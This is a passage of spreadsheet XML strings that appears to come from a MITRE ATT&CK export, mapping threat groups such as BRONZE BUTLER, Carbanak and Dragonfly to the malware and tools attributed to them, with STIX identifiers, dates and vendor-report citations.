    <t>09 January 2022</t>
  </si>
  <si>
    <t>(Citation: Talos ZxShell Oct 2014)(Citation: Cisco Group 72)</t>
  </si>
  <si>
    <t>relationship--1aee1049-89be-45b8-ae2f-83bf4e35d5a3</t>
  </si>
  <si>
    <t>relationship--4f8411e1-71c2-46da-a789-9403c4b1f967</t>
  </si>
  <si>
    <t>G1002</t>
  </si>
  <si>
    <t>BITTER</t>
  </si>
  <si>
    <t>intrusion-set--7f848c02-4d1e-4808-a4ae-4670681370a9</t>
  </si>
  <si>
    <t>S1013</t>
  </si>
  <si>
    <t>ZxxZ</t>
  </si>
  <si>
    <t>malware--97cfbdc6-504d-41e9-a46c-78a9f806ff0d</t>
  </si>
  <si>
    <t>(Citation: Cisco Talos Bitter Bangladesh May 2022)</t>
  </si>
  <si>
    <t>relationship--0aa994e4-f1a3-4c14-b5e0-f2f6247d6630</t>
  </si>
  <si>
    <t>02 June 2022</t>
  </si>
  <si>
    <t>G0060</t>
  </si>
  <si>
    <t>BRONZE BUTLER</t>
  </si>
  <si>
    <t>intrusion-set--93f52415-0fe4-4d3d-896c-fc9b8e88ab90</t>
  </si>
  <si>
    <t>S0469</t>
  </si>
  <si>
    <t>ABK</t>
  </si>
  <si>
    <t>malware--a0ebedca-d558-4e48-8ff7-4bf76208d90c</t>
  </si>
  <si>
    <t>(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>relationship--6e122559-0e6e-4514-aa60-652e99292077</t>
  </si>
  <si>
    <t>10 June 2020</t>
  </si>
  <si>
    <t>S0473</t>
  </si>
  <si>
    <t>Avenger</t>
  </si>
  <si>
    <t>malware--36ede314-7db4-4d09-b53d-81bbfbe5f6f8</t>
  </si>
  <si>
    <t>relationship--ff5d1433-de7a-4aba-95c4-5d92782589f9</t>
  </si>
  <si>
    <t>11 June 2020</t>
  </si>
  <si>
    <t>S0470</t>
  </si>
  <si>
    <t>BBK</t>
  </si>
  <si>
    <t>malware--f0fc920e-57a3-4af5-89be-9ea594c8b1ea</t>
  </si>
  <si>
    <t>relationship--a8b5c1b4-9ccf-46bc-9074-59e866efcc83</t>
  </si>
  <si>
    <t>S0187</t>
  </si>
  <si>
    <t>Daserf</t>
  </si>
  <si>
    <t>malware--b6b3dfc7-9a81-43ff-ac04-698bad48973a</t>
  </si>
  <si>
    <t>(Citation: Trend Micro Daserf Nov 2017)(Citation: Symantec Tick Apr 2016)</t>
  </si>
  <si>
    <t>relationship--f52f1b34-a96a-45a0-8cc0-2f138a3f1257</t>
  </si>
  <si>
    <t>(Citation: Secureworks BRONZE BUTLER Oct 2017)(Citation: Symantec Tick Apr 2016)(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>relationship--28471736-5b62-4132-b4ed-c22ae449b455</t>
  </si>
  <si>
    <t>(Citation: Secureworks BRONZE BUTLER Oct 2017)</t>
  </si>
  <si>
    <t>relationship--f6d23c6b-01c8-4bea-9bc6-2c66fbbbd3ae</t>
  </si>
  <si>
    <t>(Citation: Recorded Future RedEcho Feb 2021)</t>
  </si>
  <si>
    <t>relationship--f7a90a34-f9ad-45a9-abd2-22a4e27ebdfd</t>
  </si>
  <si>
    <t>(Citation: Secureworks BRONZE BUTLER Oct 2017)(Citation: Symantec Tick Apr 2016)</t>
  </si>
  <si>
    <t>relationship--fc79f30d-94c8-400e-ab10-21d2a2527788</t>
  </si>
  <si>
    <t>relationship--80fc5f0c-3dcb-45ab-807a-bfa3d64334c6</t>
  </si>
  <si>
    <t>S0471</t>
  </si>
  <si>
    <t>build_downer</t>
  </si>
  <si>
    <t>malware--d2c7f8ad-3b50-4cfa-bbb1-799eff06fb40</t>
  </si>
  <si>
    <t>relationship--3c3579df-fbd4-4a68-8ee8-e45861a3eda0</t>
  </si>
  <si>
    <t>relationship--42897880-fe55-4f54-a42c-f85ba19fb39a</t>
  </si>
  <si>
    <t>S0472</t>
  </si>
  <si>
    <t>down_new</t>
  </si>
  <si>
    <t>malware--8be7c69e-d8e3-4970-9668-61de08e508cc</t>
  </si>
  <si>
    <t>relationship--ebab1ba1-e02b-41ab-8682-5a44d68fb155</t>
  </si>
  <si>
    <t>relationship--fda1acb3-8e87-4fff-ae19-7e6a2ff9d6c3</t>
  </si>
  <si>
    <t>relationship--d691e305-8ce5-40cd-a648-b0dcab329e69</t>
  </si>
  <si>
    <t>G0135</t>
  </si>
  <si>
    <t>BackdoorDiplomacy</t>
  </si>
  <si>
    <t>intrusion-set--9735c036-8ebe-47e9-9c77-b0ae656dab93</t>
  </si>
  <si>
    <t>(Citation: ESET BackdoorDiplomacy Jun 2021)</t>
  </si>
  <si>
    <t>relationship--368ed1d6-0ce4-457c-b0b8-aad079d7a28e</t>
  </si>
  <si>
    <t>relationship--8ac0d84e-76ce-4702-8616-2a2f9b41cfdc</t>
  </si>
  <si>
    <t>relationship--8b26be81-0112-43be-a3e5-a94d5b15c738</t>
  </si>
  <si>
    <t>S0262</t>
  </si>
  <si>
    <t>QuasarRAT</t>
  </si>
  <si>
    <t>tool--da04ac30-27da-4959-a67d-450ce47d9470</t>
  </si>
  <si>
    <t>relationship--bc592166-c29c-4913-b8a0-ec266321a325</t>
  </si>
  <si>
    <t>S0647</t>
  </si>
  <si>
    <t>Turian</t>
  </si>
  <si>
    <t>malware--350f12cf-fd3b-4dad-b323-14b943090df4</t>
  </si>
  <si>
    <t>relationship--1ea2c546-6719-4695-93e6-891c3bad6194</t>
  </si>
  <si>
    <t>G0098</t>
  </si>
  <si>
    <t>BlackTech</t>
  </si>
  <si>
    <t>intrusion-set--6fe8a2a1-a1b0-4af8-953d-4babd329f8f8</t>
  </si>
  <si>
    <t>S0696</t>
  </si>
  <si>
    <t>Flagpro</t>
  </si>
  <si>
    <t>malware--592260fb-dd5c-4a30-8d99-106a0485be0d</t>
  </si>
  <si>
    <t>(Citation: NTT Security Flagpro new December 2021)</t>
  </si>
  <si>
    <t>relationship--ca856513-b1ac-46d4-8b24-eafed59bd5f0</t>
  </si>
  <si>
    <t>S0437</t>
  </si>
  <si>
    <t>Kivars</t>
  </si>
  <si>
    <t>malware--b2d134a1-7bd5-4293-94d4-8fc978cb1cd7</t>
  </si>
  <si>
    <t>(Citation: TrendMicro BlackTech June 2017)(Citation: Symantec Palmerworm Sep 2020)</t>
  </si>
  <si>
    <t>relationship--28ee4a1e-1e63-4c72-8424-4f923b074ad9</t>
  </si>
  <si>
    <t>06 May 2020</t>
  </si>
  <si>
    <t>S0435</t>
  </si>
  <si>
    <t>PLEAD</t>
  </si>
  <si>
    <t>malware--b57f419e-8b12-49d3-886b-145383725dcd</t>
  </si>
  <si>
    <t>(Citation: TrendMicro BlackTech June 2017)(Citation: JPCert PLEAD Downloader June 2018)(Citation: Trend Micro Waterbear December 2019)(Citation: Symantec Palmerworm Sep 2020)</t>
  </si>
  <si>
    <t>relationship--036f4704-ce28-49cf-bb57-e4ce5079981e</t>
  </si>
  <si>
    <t>(Citation: Symantec Palmerworm Sep 2020)</t>
  </si>
  <si>
    <t>relationship--36f159f7-5018-4889-a540-98e3ac242602</t>
  </si>
  <si>
    <t>S0436</t>
  </si>
  <si>
    <t>TSCookie</t>
  </si>
  <si>
    <t>malware--76ac7989-c5cc-42e2-93e3-d6c476f01ace</t>
  </si>
  <si>
    <t>(Citation: JPCert TSCookie March 2018)</t>
  </si>
  <si>
    <t>relationship--c756d00a-9ca0-435e-b226-bff2c123b390</t>
  </si>
  <si>
    <t>S0579</t>
  </si>
  <si>
    <t>Waterbear</t>
  </si>
  <si>
    <t>malware--f3f1fbed-7e29-49cb-8579-4a378f858deb</t>
  </si>
  <si>
    <t>(Citation: Trend Micro Waterbear December 2019)</t>
  </si>
  <si>
    <t>relationship--d14e6464-a6c5-4554-a463-88e267828397</t>
  </si>
  <si>
    <t>G0108</t>
  </si>
  <si>
    <t>Blue Mockingbird</t>
  </si>
  <si>
    <t>intrusion-set--73a80fab-2aa3-48e0-a4d0-3a4828200aee</t>
  </si>
  <si>
    <t>(Citation: RedCanary Mockingbird May 2020)</t>
  </si>
  <si>
    <t>relationship--47e9267e-e84d-43b6-992a-5f42d39c45bb</t>
  </si>
  <si>
    <t>27 May 2020</t>
  </si>
  <si>
    <t>G0008</t>
  </si>
  <si>
    <t>Carbanak</t>
  </si>
  <si>
    <t>intrusion-set--55033a4d-3ffe-46b2-99b4-2c1541e9ce1c</t>
  </si>
  <si>
    <t>S0030</t>
  </si>
  <si>
    <t>malware--72f54d66-675d-4587-9bd3-4ed09f9522e4</t>
  </si>
  <si>
    <t>(Citation: Kaspersky Carbanak)</t>
  </si>
  <si>
    <t>relationship--8ab176f0-009f-49e9-ba4b-f476c33697f4</t>
  </si>
  <si>
    <t>relationship--c4bea2b7-e8a2-45d0-bac2-4d82576c1521</t>
  </si>
  <si>
    <t>relationship--d0f797ce-9176-4b74-8d64-fad4e1bdef4f</t>
  </si>
  <si>
    <t>(Citation: Group-IB Anunak)</t>
  </si>
  <si>
    <t>relationship--e2e2d332-f27b-46fb-b48f-4ee1872b321f</t>
  </si>
  <si>
    <t>G0114</t>
  </si>
  <si>
    <t>Chimera</t>
  </si>
  <si>
    <t>intrusion-set--8c1f0187-0826-4320-bddc-5f326cfcfe2c</t>
  </si>
  <si>
    <t>(Citation: Cycraft Chimera April 2020)</t>
  </si>
  <si>
    <t>relationship--5db02c00-0d28-4831-bad9-66737bb62eca</t>
  </si>
  <si>
    <t>28 October 2020</t>
  </si>
  <si>
    <t>06 February 2023</t>
  </si>
  <si>
    <t>(Citation: Cycraft Chimera April 2020)(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>relationship--f7120568-70db-4111-985c-9970775206c1</t>
  </si>
  <si>
    <t>relationship--be49ddce-5925-4fb2-8822-0b665d9aa812</t>
  </si>
  <si>
    <t>22 September 2020</t>
  </si>
  <si>
    <t>(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>relationship--b626d35a-2ddd-425a-97bc-84c328b57726</t>
  </si>
  <si>
    <t>relationship--0a3dbe33-465a-421e-82ca-573d2ca25691</t>
  </si>
  <si>
    <t>S0404</t>
  </si>
  <si>
    <t>esentutl</t>
  </si>
  <si>
    <t>tool--c256da91-6dd5-40b2-beeb-ee3b22ab3d27</t>
  </si>
  <si>
    <t>relationship--93bc896f-d2c2-4d6b-b231-fdc084aeed69</t>
  </si>
  <si>
    <t>G0003</t>
  </si>
  <si>
    <t>Cleaver</t>
  </si>
  <si>
    <t>intrusion-set--8f5e8dc7-739d-4f5e-a8a1-a66e004d7063</t>
  </si>
  <si>
    <t>(Citation: Cylance Cleaver)</t>
  </si>
  <si>
    <t>relationship--b08e3c96-25a7-412f-bbfb-63e010ef3891</t>
  </si>
  <si>
    <t>22 July 2022</t>
  </si>
  <si>
    <t>S0056</t>
  </si>
  <si>
    <t>Net Crawler</t>
  </si>
  <si>
    <t>malware--fde50aaa-f5de-4cb8-989a-babb57d6a704</t>
  </si>
  <si>
    <t>relationship--16fd44bf-405b-49c1-96d7-0cacb5d65e74</t>
  </si>
  <si>
    <t>relationship--3cd8ef78-9d92-4e28-97ae-5bd6c698bfec</t>
  </si>
  <si>
    <t>S0004</t>
  </si>
  <si>
    <t>TinyZBot</t>
  </si>
  <si>
    <t>malware--c0c45d38-fe57-4cd4-b2b2-9ecd0ddd4ca9</t>
  </si>
  <si>
    <t>relationship--49957d89-7449-476a-b542-d7811a86c230</t>
  </si>
  <si>
    <t>G0080</t>
  </si>
  <si>
    <t>Cobalt Group</t>
  </si>
  <si>
    <t>intrusion-set--dc6fe6ee-04c2-49be-ba3d-f38d2463c02a</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</si>
  <si>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</si>
  <si>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relationship--bab233b8-640c-4a8b-90fa-d5b959adefbb</t>
  </si>
  <si>
    <t>23 December 2022</t>
  </si>
  <si>
    <t>(Citation: PTSecurity Cobalt Group Aug 2017)(Citation: PTSecurity Cobalt Dec 2016)(Citation: Group IB Cobalt Aug 2017)</t>
  </si>
  <si>
    <t>relationship--4807dbdc-6bcb-4aed-96f4-a782551eaefe</t>
  </si>
  <si>
    <t>26 July 2019</t>
  </si>
  <si>
    <t>S0284</t>
  </si>
  <si>
    <t>More_eggs</t>
  </si>
  <si>
    <t>malware--bfd2738c-8b43-43c3-bc9f-d523c8e88bf4</t>
  </si>
  <si>
    <t>(Citation: Talos Cobalt Group July 2018)(Citation: Crowdstrike GTR2020 Mar 2020)</t>
  </si>
  <si>
    <t>relationship--a80751f1-8def-4415-a38b-35ceb703244c</t>
  </si>
  <si>
    <t>(Citation: PTSecurity Cobalt Group Aug 2017)(Citation: Group IB Cobalt Aug 2017)</t>
  </si>
  <si>
    <t>relationship--e46dc495-5581-471c-84b5-b0dd825471f9</t>
  </si>
  <si>
    <t>(Citation: PTSecurity Cobalt Dec 2016)</t>
  </si>
  <si>
    <t>relationship--ae11039c-6711-4860-a1b6-c7a8e0bcbbfb</t>
  </si>
  <si>
    <t>S0646</t>
  </si>
  <si>
    <t>SpicyOmelette</t>
  </si>
  <si>
    <t>malware--599cd7b5-37b5-4cdd-8174-2811531ce9d0</t>
  </si>
  <si>
    <t>(Citation: Secureworks GOLD KINGSWOOD September 2018)</t>
  </si>
  <si>
    <t>relationship--a9062522-1891-4405-b8e6-f6465834c18a</t>
  </si>
  <si>
    <t>G0142</t>
  </si>
  <si>
    <t>Confucius</t>
  </si>
  <si>
    <t>intrusion-set--6eded342-33e5-4451-b6b2-e1c62863129f</t>
  </si>
  <si>
    <t>S0670</t>
  </si>
  <si>
    <t>WarzoneRAT</t>
  </si>
  <si>
    <t>malware--fde19a18-e502-467f-be14-58c71b4e7f4b</t>
  </si>
  <si>
    <t>(Citation: Check Point Warzone Feb 2020)(Citation: Uptycs Confucius APT Jan 2021)</t>
  </si>
  <si>
    <t>relationship--994462e4-b75a-45b5-9b63-43e449bb1b10</t>
  </si>
  <si>
    <t>27 December 2021</t>
  </si>
  <si>
    <t>30 June 2022</t>
  </si>
  <si>
    <t>G0052</t>
  </si>
  <si>
    <t>CopyKittens</t>
  </si>
  <si>
    <t>intrusion-set--dcd81c6e-ebf7-4a16-93e0-9a97fa49c88a</t>
  </si>
  <si>
    <t>(Citation: ClearSky Wilted Tulip July 2017)</t>
  </si>
  <si>
    <t>relationship--82c12a79-e80d-4eba-91ab-d14fd98cb539</t>
  </si>
  <si>
    <t>relationship--a622b97a-e473-45a5-9e93-85c883f02074</t>
  </si>
  <si>
    <t>03 May 2019</t>
  </si>
  <si>
    <t>S0167</t>
  </si>
  <si>
    <t>Matryoshka</t>
  </si>
  <si>
    <t>malware--1cc934e4-b01d-4543-a011-b988dfc1a458</t>
  </si>
  <si>
    <t>relationship--fe46e6be-a008-490a-b0b1-243b8445824e</t>
  </si>
  <si>
    <t>S0164</t>
  </si>
  <si>
    <t>TDTESS</t>
  </si>
  <si>
    <t>malware--0b32ec39-ba61-4864-9ebe-b4b0b73caf9a</t>
  </si>
  <si>
    <t>relationship--dc4e54ed-ca71-4dd1-a61e-714222c0c76d</t>
  </si>
  <si>
    <t>G0070</t>
  </si>
  <si>
    <t>Dark Caracal</t>
  </si>
  <si>
    <t>intrusion-set--8a831aaa-f3e0-47a3-bed8-a9ced744dd12</t>
  </si>
  <si>
    <t>S0234</t>
  </si>
  <si>
    <t>Bandook</t>
  </si>
  <si>
    <t>malware--835a79f1-842d-472d-b8f4-d54b545c341b</t>
  </si>
  <si>
    <t xml:space="preserve">(Citation: Lookout Dark Caracal Jan 2018)(Citation: CheckPoint Bandook Nov 2020) </t>
  </si>
  <si>
    <t>relationship--e30bb29e-1f1c-4d68-9720-ae99da0c84ee</t>
  </si>
  <si>
    <t>31 May 2021</t>
  </si>
  <si>
    <t>S0235</t>
  </si>
  <si>
    <t>CrossRAT</t>
  </si>
  <si>
    <t>malware--a5e91d50-24fa-44ec-9894-39a88f658cea</t>
  </si>
  <si>
    <t>(Citation: Lookout Dark Caracal Jan 2018)</t>
  </si>
  <si>
    <t>relationship--c79ca18d-b316-476e-8adf-df28a4b40074</t>
  </si>
  <si>
    <t>S0182</t>
  </si>
  <si>
    <t>FinFisher</t>
  </si>
  <si>
    <t>malware--a5528622-3a8a-4633-86ce-8cdaf8423858</t>
  </si>
  <si>
    <t>relationship--312950f2-80d2-4941-bfce-b97b2cb7a1ff</t>
  </si>
  <si>
    <t>G0079</t>
  </si>
  <si>
    <t>DarkHydrus</t>
  </si>
  <si>
    <t>intrusion-set--6b9ebeb5-20bf-48b0-afb7-988d769a2f01</t>
  </si>
  <si>
    <t>(Citation: Unit 42 DarkHydrus July 2018)(Citation: Unit 42 Playbook Dec 2017)</t>
  </si>
  <si>
    <t>relationship--8d1da663-a3eb-4464-9be1-b43b8671e599</t>
  </si>
  <si>
    <t>relationship--17aef45b-9a3c-4192-af31-4a21300a90e0</t>
  </si>
  <si>
    <t>22 April 2019</t>
  </si>
  <si>
    <t>S0270</t>
  </si>
  <si>
    <t>RogueRobin</t>
  </si>
  <si>
    <t>malware--8ec6e3b4-b06d-4805-b6aa-af916acc2122</t>
  </si>
  <si>
    <t>(Citation: Unit 42 DarkHydrus July 2018)(Citation: Unit42 DarkHydrus Jan 2019)</t>
  </si>
  <si>
    <t>relationship--87f40abf-4ee5-4f56-8150-97e0dd823a93</t>
  </si>
  <si>
    <t>G0105</t>
  </si>
  <si>
    <t>DarkVishnya</t>
  </si>
  <si>
    <t>intrusion-set--813636db-3939-4a45-bea9-6113e970c029</t>
  </si>
  <si>
    <t xml:space="preserve">(Citation: Securelist DarkVishnya Dec 2018) </t>
  </si>
  <si>
    <t>relationship--475fef11-3344-4305-9710-cc41ba8acc0a</t>
  </si>
  <si>
    <t>15 May 2020</t>
  </si>
  <si>
    <t>relationship--29b5ee68-0bb0-4264-a781-ece3014fb3dd</t>
  </si>
  <si>
    <t>G0009</t>
  </si>
  <si>
    <t>Deep Panda</t>
  </si>
  <si>
    <t>intrusion-set--a653431d-6a5e-4600-8ad3-609b5af57064</t>
  </si>
  <si>
    <t>(Citation: ThreatConnect Anthem)</t>
  </si>
  <si>
    <t>relationship--ba4e03d1-f9b6-442d-974b-2fb7feddb551</t>
  </si>
  <si>
    <t>S0080</t>
  </si>
  <si>
    <t>Mivast</t>
  </si>
  <si>
    <t>malware--fbb470da-1d44-4f29-bbb3-9efbe20f94a3</t>
  </si>
  <si>
    <t>(Citation: Symantec Black Vine)</t>
  </si>
  <si>
    <t>relationship--235fe6f1-66d1-4cf4-adb9-3bc7f081144a</t>
  </si>
  <si>
    <t>20 July 2022</t>
  </si>
  <si>
    <t>(Citation: Alperovitch 2014)</t>
  </si>
  <si>
    <t>relationship--2df910df-37cc-4349-96c3-f938fa5a9054</t>
  </si>
  <si>
    <t>relationship--2ce2f87e-527d-4bc1-9ba1-79ade0a4db59</t>
  </si>
  <si>
    <t>S0074</t>
  </si>
  <si>
    <t>Sakula</t>
  </si>
  <si>
    <t>malware--96b08451-b27a-4ff6-893f-790e26393a8e</t>
  </si>
  <si>
    <t>relationship--70dc6b5c-c524-429e-a6ab-0dd40f0482c1</t>
  </si>
  <si>
    <t>S0142</t>
  </si>
  <si>
    <t>StreamEx</t>
  </si>
  <si>
    <t>malware--91000a8a-58cc-4aba-9ad0-993ad6302b86</t>
  </si>
  <si>
    <t>(Citation: Cylance Shell Crew Feb 2017)</t>
  </si>
  <si>
    <t>relationship--66a3ab46-abcb-4234-a786-638044cfc50e</t>
  </si>
  <si>
    <t>relationship--9d081347-3446-47a4-b5a9-d7a9d2d499e7</t>
  </si>
  <si>
    <t>G0017</t>
  </si>
  <si>
    <t>DragonOK</t>
  </si>
  <si>
    <t>intrusion-set--f3bdec95-3d62-42d9-a840-29630f6cdc1a</t>
  </si>
  <si>
    <t>(Citation: New DragonOK)</t>
  </si>
  <si>
    <t>relationship--ee2739de-6829-4c73-b72b-91ba4b9fac5c</t>
  </si>
  <si>
    <t>(Citation: Operation Quantum Entanglement)</t>
  </si>
  <si>
    <t>relationship--8797579b-e3be-4209-a71b-255a4d08243d</t>
  </si>
  <si>
    <t>G0035</t>
  </si>
  <si>
    <t>Dragonfly</t>
  </si>
  <si>
    <t>intrusion-set--1c63d4ec-0a75-4daa-b1df-0d11af3d3cc1</t>
  </si>
  <si>
    <t>S0093</t>
  </si>
  <si>
    <t>Backdoor.Oldrea</t>
  </si>
  <si>
    <t>malware--083bb47b-02c8-4423-81a2-f9ef58572974</t>
  </si>
  <si>
    <t>(Citation: Symantec Dragonfly)(Citation: Gigamon Berserk Bear October 2021)</t>
  </si>
  <si>
    <t>relationship--d4968f45-d06b-4843-8f72-6e08beb94cab</t>
  </si>
  <si>
    <t>07 December 2021</t>
  </si>
  <si>
    <t>(Citation: Secureworks IRON LIBERTY July 2019)(Citation: US-CERT TA18-074A)</t>
  </si>
  <si>
    <t>relationship--a60d34fc-9c1e-4b36-a82b-56258445c7f0</t>
  </si>
  <si>
    <t>(Citation: US-CERT TA18-074A)(Citation: Core Security Impacket)</t>
  </si>
  <si>
    <t>relationship--68ece5ad-73bd-4562-ac08-877bd1e18f79</t>
  </si>
  <si>
    <t>S0500</t>
  </si>
  <si>
    <t>MCMD</t>
  </si>
  <si>
    <t>tool--975737f1-b10d-476f-8bda-3ec26ea57172</t>
  </si>
  <si>
    <t>(Citation: Secureworks MCMD July 2019)</t>
  </si>
  <si>
    <t>relationship--18210ad3-d5ed-414e-9b7d-04fc622dc2e9</t>
  </si>
  <si>
    <t>(Citation: Secureworks IRON LIBERTY July 2019)</t>
  </si>
  <si>
    <t>relationship--dfd6892f-82a4-4db4-a132-3d6f221e55f4</t>
  </si>
  <si>
    <t>12 August 2020</t>
  </si>
  <si>
    <t>(Citation: US-CERT TA18-074A)</t>
  </si>
  <si>
    <t>relationship--2c9e64fa-52a5-4233-a1b7-333e5d7b9d40</t>
  </si>
  <si>
    <t>(Citation: Secureworks IRON LIBERTY July 2019)(Citation: US-CERT TA18-074A)(Citation: Symantec Dragonfly Sept 2017)(Citation: Gigamon Berserk Bear October 2021)</t>
  </si>
  <si>
    <t>relationship--e068332d-0b1c-4aba-a60f-37c640e20d10</t>
  </si>
  <si>
    <t>08 December 2021</t>
  </si>
  <si>
    <t>relationship--b0198291-ac44-47c5-9730-c11acfb1999d</t>
  </si>
  <si>
    <t>S0094</t>
  </si>
  <si>
    <t>Trojan.Karagany</t>
  </si>
  <si>
    <t>malware--82cb34ba-02b5-432b-b2d2-07f55cbf674d</t>
  </si>
  <si>
    <t>(Citation: Symantec Dragonfly)(Citation: Secureworks Karagany July 2019)(Citation: Gigamon Berserk Bear October 2021)</t>
  </si>
  <si>
    <t>relationship--fa9a8640-75e5-458c-99c0-e5e85aa32a77</t>
  </si>
  <si>
    <t>relationship--fc6b1d58-05bf-41a0-a7fd-fcbbae894430</t>
  </si>
  <si>
    <t>G1011</t>
  </si>
  <si>
    <t>EXOTIC LILY</t>
  </si>
  <si>
    <t>intrusion-set--129f2f77-1ab2-4c35-bd5e-21260cee92af</t>
  </si>
  <si>
    <t>(Citation: Google EXOTIC LILY March 2022)</t>
  </si>
  <si>
    <t>relationship--0277787b-6419-4371-aa5d-77b2d0cc025f</t>
  </si>
  <si>
    <t>S1039</t>
  </si>
  <si>
    <t>Bumblebee</t>
  </si>
  <si>
    <t>malware--04378e79-4387-468a-a8f7-f974b8254e44</t>
  </si>
  <si>
    <t>relationship--b2a03f9f-883b-4ced-b4a2-cd49d8e7a3aa</t>
  </si>
  <si>
    <t>G1006</t>
  </si>
  <si>
    <t>Earth Lusca</t>
  </si>
  <si>
    <t>intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034</t>
  </si>
  <si>
    <t>(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>relationship--9889f167-2a60-4e32-8d2a-410f485551b7</t>
  </si>
  <si>
    <t>01 July 2022</t>
  </si>
  <si>
    <t>relationship--09c54ed8-4b03-4e39-b364-bf2e751dbe06</t>
  </si>
  <si>
    <t>relationship--e1130af1-b49f-4106-8846-7f3e65a65535</t>
  </si>
  <si>
    <t>S0359</t>
  </si>
  <si>
    <t>Nltest</t>
  </si>
  <si>
    <t>tool--981acc4c-2ede-4b56-be6e-fa1a75f37acf</t>
  </si>
  <si>
    <t>relationship--c336d7c6-0876-445c-8197-924eae28bc16</t>
  </si>
  <si>
    <t>09 September 2022</t>
  </si>
  <si>
    <t>relationship--427f7417-6d8a-4b0b-8bcf-a6acdd28586e</t>
  </si>
  <si>
    <t>relationship--f23cf8d3-0b34-4f09-bef1-98d27c33909a</t>
  </si>
  <si>
    <t>relationship--62a11eb5-d59b-49d3-b4b5-d88e3cb4e538</t>
  </si>
  <si>
    <t>relationship--c15dcb96-82f8-4f6e-bfc2-8d636d71567a</t>
  </si>
  <si>
    <t>relationship--8b18d3d9-154d-435a-a174-d84ef5961ec8</t>
  </si>
  <si>
    <t>G0066</t>
  </si>
  <si>
    <t>Elderwood</t>
  </si>
  <si>
    <t>intrusion-set--03506554-5f37-4f8f-9ce4-0e9f01a1b484</t>
  </si>
  <si>
    <t>S0204</t>
  </si>
  <si>
    <t>Briba</t>
  </si>
  <si>
    <t>malware--79499993-a8d6-45eb-b343-bf58dea5bdde</t>
  </si>
  <si>
    <t>(Citation: Symantec Elderwood Sept 2012)</t>
  </si>
  <si>
    <t>relationship--2d20e20c-7f01-4834-88de-030ca09ee540</t>
  </si>
  <si>
    <t>06 January 2021</t>
  </si>
  <si>
    <t>relationship--4a851ebf-c021-4ab1-a02f-84b03d65fdda</t>
  </si>
  <si>
    <t>S0211</t>
  </si>
  <si>
    <t>Linfo</t>
  </si>
  <si>
    <t>malware--e9e9bfe2-76f4-4870-a2a1-b7af89808613</t>
  </si>
  <si>
    <t>relationship--50cc59f8-6d62-4140-b5c6-40da528a5e13</t>
  </si>
  <si>
    <t>S0205</t>
  </si>
  <si>
    <t>Naid</t>
  </si>
  <si>
    <t>malware--48523614-309e-43bf-a2b8-705c2b45d7b2</t>
  </si>
  <si>
    <t>relationship--13c8251c-f380-425c-b762-2298e5802dee</t>
  </si>
  <si>
    <t>S0210</t>
  </si>
  <si>
    <t>Nerex</t>
  </si>
  <si>
    <t>malware--c251e4a5-9a2e-4166-8e42-442af75c3b9a</t>
  </si>
  <si>
    <t>relationship--5406867b-20fe-43e3-bd64-6816ba340b60</t>
  </si>
  <si>
    <t>S0208</t>
  </si>
  <si>
    <t>Pasam</t>
  </si>
  <si>
    <t>malware--e811ff6a-4cef-4856-a6ae-a7daf9ed39ae</t>
  </si>
  <si>
    <t>relationship--f718c8ae-859f-4987-bf8c-9fac91a610bf</t>
  </si>
  <si>
    <t>relationship--003f23dd-24c7-4b3b-b703-0bf081d638f4</t>
  </si>
  <si>
    <t>S0207</t>
  </si>
  <si>
    <t>Vasport</t>
  </si>
  <si>
    <t>malware--f4d8a2d6-c684-453a-8a14-cf4a94f755c5</t>
  </si>
  <si>
    <t>relationship--77426812-954b-49dd-9db8-c3aa99113678</t>
  </si>
  <si>
    <t>S0206</t>
  </si>
  <si>
    <t>Wiarp</t>
  </si>
  <si>
    <t>malware--039814a0-88de-46c5-a4fb-b293db21880a</t>
  </si>
  <si>
    <t>relationship--949c94e6-7c2f-4605-957f-11b7cd5a6097</t>
  </si>
  <si>
    <t>G1003</t>
  </si>
  <si>
    <t>Ember Bear</t>
  </si>
  <si>
    <t>intrusion-set--a7f57cc1-4540-4429-823f-f4e56b8473c9</t>
  </si>
  <si>
    <t>S1017</t>
  </si>
  <si>
    <t>OutSteel</t>
  </si>
  <si>
    <t>malware--c113230f-f044-423b-af63-9b63c802f5ae</t>
  </si>
  <si>
    <t>(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>relationship--176faf41-d8c0-4de5-a31e-010f3bad13f3</t>
  </si>
  <si>
    <t>09 June 2022</t>
  </si>
  <si>
    <t>S1018</t>
  </si>
  <si>
    <t>Saint Bot</t>
  </si>
  <si>
    <t>malware--7724581b-06ff-4d2b-b77c-80dc8d53070b</t>
  </si>
  <si>
    <t>relationship--60988a82-9b9f-4e52-899b-f17dee1af53e</t>
  </si>
  <si>
    <t>S0689</t>
  </si>
  <si>
    <t>WhisperGate</t>
  </si>
  <si>
    <t>malware--49fee0b0-390e-4bde-97f8-97ed46bd19b7</t>
  </si>
  <si>
    <t>(Citation: CrowdStrike Ember Bear Profile March 2022)(Citation: Mandiant UNC2589 March 2022)</t>
  </si>
  <si>
    <t>relationship--a9200a4f-271b-4b13-864b-a3e21de3c9f2</t>
  </si>
  <si>
    <t>G0120</t>
  </si>
  <si>
    <t>Evilnum</t>
  </si>
  <si>
    <t>intrusion-set--1f0f9a14-11aa-49aa-9174-bcd0eaa979de</t>
  </si>
  <si>
    <t>S0568</t>
  </si>
  <si>
    <t>EVILNUM</t>
  </si>
  <si>
    <t>malware--7cdfccda-2950-4167-981a-60872ff5d0db</t>
  </si>
  <si>
    <t>(Citation: Prevailion EvilNum May 2020)</t>
  </si>
  <si>
    <t>relationship--81cf0260-877d-47ba-b98d-5d2cea453cdf</t>
  </si>
  <si>
    <t>03 February 2021</t>
  </si>
  <si>
    <t>19 January 2022</t>
  </si>
  <si>
    <t>(Citation: ESET EvilNum July 2020)</t>
  </si>
  <si>
    <t>relationship--c0a10dc5-51e4-4ec3-a827-4999bde3ed58</t>
  </si>
  <si>
    <t>27 January 2021</t>
  </si>
  <si>
    <t>relationship--17fc72c1-83be-4dce-a795-d2a36e6354ca</t>
  </si>
  <si>
    <t>G0051</t>
  </si>
  <si>
    <t>FIN10</t>
  </si>
  <si>
    <t>intrusion-set--fbe9387f-34e6-4828-ac28-3080020c597b</t>
  </si>
  <si>
    <t>(Citation: FireEye FIN10 June 2017)</t>
  </si>
